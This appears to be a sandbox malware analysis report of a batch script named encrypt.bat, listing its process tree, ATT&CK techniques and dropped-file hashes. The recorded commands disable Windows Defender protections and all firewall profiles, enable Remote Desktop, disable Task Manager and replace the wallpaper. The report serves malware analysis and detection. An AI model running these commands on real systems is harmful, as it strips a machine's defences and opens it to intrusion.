"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
4⤵
PID:4512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
4⤵
PID:1832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
4⤵
PID:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
4⤵
PID:4916

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
4⤵
PID:2364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
4⤵
PID:2772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
4⤵
PID:3312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
4⤵
PID:2328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,1287586657488130877,6560110692057221287,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3144 /prefetch:2
4⤵
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
4⤵
PID:3400

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
4⤵
PID:4616

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
4⤵
PID:4980

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
4⤵
PID:4540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
4⤵
- Modifies Windows Firewall
PID:1304

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
4⤵
- Modifies Windows Firewall
PID:3312

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
- Modifies Windows Firewall
PID:512

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
4⤵
- Modifies Windows Firewall
PID:1240

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
4⤵
- Modifies Windows Firewall
PID:2644

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:3668

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:2328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
5⤵
PID:544

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
6⤵
PID:1824

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
6⤵
PID:2644

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
6⤵
PID:444

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
6⤵
PID:3404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
6⤵
- Modifies Windows Firewall
PID:3316

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
6⤵
- Modifies Windows Firewall
PID:1528

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
6⤵
- Modifies Windows Firewall
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
4⤵
- Sets desktop wallpaper using registry
PID:3060

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
4⤵
PID:1528

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4612

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4980

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4460

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:1928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:64

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffdcba4ab58,0x7ffdcba4ab68,0x7ffdcba4ab78
2⤵
PID:2140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1764 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:2
2⤵
PID:1300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:8
2⤵
PID:2720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:8
2⤵
PID:3832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3112 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:1
2⤵
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:1
2⤵
PID:1712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4356 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:1
2⤵
PID:444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4376 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:8
2⤵
PID:2564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1996,i,605664523534847973,12556013079824646961,131072 /prefetch:8
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4944

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:4160

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Encrypt\encrypt.bat

Filesize
2KB

MD5
d4b8e7c1b0ee37229b53d8d3c7348af0

SHA1
3467311b4001a759e24b72cf8ec7606219d4c1cc

SHA256
f9f88ccdb3900863a2747809a9e4fe3acd4f52387c2b8e47eebe40bcce5d3fe1

SHA512
fe5bab00cf03784b34475d5bfdd29bd625d12137f6b3a96afa9435833fef639e33e4e5357c772fac829232cea20a9ebd81435d4621173722d04846ee915e2863

Download Submit
C:\Encrypt\encrypt.html

Filesize
1KB

MD5
60722a327960e4b4f5d967101a72ed06

SHA1
04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e

SHA256
3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd

SHA512
98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
6db0ff7918c892b3f02b01d897828859

SHA1
3feb752ccdc3c9d69291aa187425eea75007f48d

SHA256
13b4f55c5148681a65aba0c00addb4f195d12356555873c879022d9f72836c66

SHA512
f086dc3c34f46f8473b731ad08005b5f7dd21047d564e0bb71ab27b0aa43c7fce6129a7490dec95aab989c706d5545b4dfc986ce2fed50b654f67d6ef7b26ff7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
eea6d20767f67c966c2579a38d1789cb

SHA1
90bbe243334ab70bfdacff5bfef35c75c9400779

SHA256
e69f899f173a392dfa18d558856755dc5d92b3bc90415f5262bea66cfeb4371a

SHA512
1881f74ba13bbf41704a38d997765cab6fca4f5f73338cbd5db406e827d882ed693a4a7ad77ec8f07d4477257cd3e99f2454f5f2994709e049d59a9fb3d2bb1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
b48bc92f66be7015e2bad3af2847de88

SHA1
555b5dd885dcabfd362347ae499c4e4aa3f5ebae

SHA256
6d4db95e2800311b9934eda58e0eebb47e080aab66c09604f1a936f2ac8b9168

SHA512
724fc0d76d1b9b2db0de2f428e74631d968975754e78dda071b0720a100f357aaadcc2ca47b9dac4767539952c20f26f1106b7eb76db723d8ae250fec9302573

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
dd67367314d36e011de5cd1913cde8b9

SHA1
9831abddfc34c332fbf570d96ea210e78583bd03

SHA256
0997d80b6527b9def64005a36727ccfad45750301a12058ed49db12207f0c603

SHA512
1a5429d3d04d4be23de2a01ce0542fc87bd62ff25c8b1cf7be30bc0f0934c97cdc38066dfe7b56340b1b73c8514562f858c7f1e152c57937e1244ef2bccb84b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
257KB

MD5
74495ba7066b8c2e0c067df0f6a5ceeb

SHA1
512273563eac307a8095510834d2f463a68f07b6

SHA256
1d71dd52ca4ed2a9235021d4015496ff2ae2816a4de8e454ca03243a2f083482

SHA512
7ceb10582b5cb8259ff69ee8d231a6ce5ca96fc27ccf72ef76c2a5139c0b50a2d5e99fa7184c9d3ff9e8c30847b21fb2250a48900749c7aa75b859d5d841c508

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
612a6c4247ef652299b376221c984213

SHA1
d306f3b16bde39708aa862aee372345feb559750

SHA256
9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a

SHA512
34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56641592f6e69f5f5fb06f2319384490

SHA1
6a86be42e2c6d26b7830ad9f4e2627995fd91069

SHA256
02d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455

SHA512
c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1a7e41fd1a906ee94b1dcd3b37782704

SHA1
e68ca621c9821c7bd8ecd23ca585d256bf565460

SHA256
2550e90e39fe8c9c09b67b21f585aa24b09bd661dc8e65f264e07f61be60fdb7

SHA512
7d89c22e475e541c906d38d2ca4393ca6d43e51cc743535b27fe5dc73c5a6f2deed74191036723dff43750e3129a9eb756d778371fb65510fc267ca8a9cec92c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
127846bb24444ba2bbcf9f11a994c011

SHA1
2b69ebb53665a86414a64941e0ab49e17d925156

SHA256
caa5452fdf0234f5f9c3281112d1cb3ac30db0d81ae6491733eaa8ed4c573ff8

SHA512
cd3aaa730ee91493b714a2c5ca1290a6aa065eb7bc68eb6b76853497596c519ea9d7a5f6281b3c23f0af0150933f68d8d77cd531beaf5412c78711c262ccb0cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b6c50e164465c6f83d46f1e77e04b4f2

SHA1
eb328f4e8fd8e522d6454bff61cbade10ea135ed

SHA256
beb57ad011c868cb720c579c4d59e1966c78208f38208801925ab99f8f9fe421

SHA512
af3406bf2082c9f8a25db0c65fa4bc07fb26d2f0fc8e8beacc0db248e84698bcabca789e244ac9075025f1b48b0c24f642c51012f87d205b7e1178346836129a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
52da11dce05a38ad12c1820371a16d25

SHA1
e60f4edd5cd1b4a59755ebee7d4d9a58e1e79f4d

SHA256
89088f8d3b836a713d7e1bbfb2c706619abc6588a3846ba9bd36dce5cd189790

SHA512
72b2699d9e93cf622cb94c2fa27c6b39e76956ade5198b8b245556914019dd91c4498e4e6c377713c36f409d5e29dac5b87b7837fb1ada2eb006d41e33bcd69e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
66c5215efa7bba598d32862cd5d4e8d1

SHA1
da8e1afeb4455f6b333d19c652561b006508f0cb

SHA256
f97f41f962c9f9960f72630ac892ecbc804190699377b5dcc4daa387f6b97cca

SHA512
a3a5169a250a540946a7a5febe6a943722bd9c7e5582111747ce314b23be727f8d14785acd46a90ac1de6ee98eaed2e78294d16bdf1bd083afa14897fac07648

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f48ffaf2d13d1818052d2067890c3b30

SHA1
9695ebecb0c1ac6832be2dd379e2d5a2247e61c7

SHA256
fe5ca2c8e982554842c9a0c8a2e612c82740c3161a536920357d58aa3cac8464

SHA512
fe77b0bd038916694181310613928cd8d45ee703bdf988ad4ad6a2c648f649695c662ae9c8e18f546d5077bbca9bde1dfe964bee46196737097a1565a45e9681

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
1832bcedef38ec2af342c38ad3f000a7

SHA1
7d33a234d5d516aa69887bc59262929cd871ec96

SHA256
8cd4e3ab76cac877a3f9c0ebd91fd170f2f13b18532ec99304dab37830b61a9e

SHA512
5facc98cf62929374be585141ef9c1660feb320c6f71857767da56bf260375c068d08eb87e9588d40f9a274b963401955097f23c0ef1f5d12a2b458d6d80cbcb

Download Submit
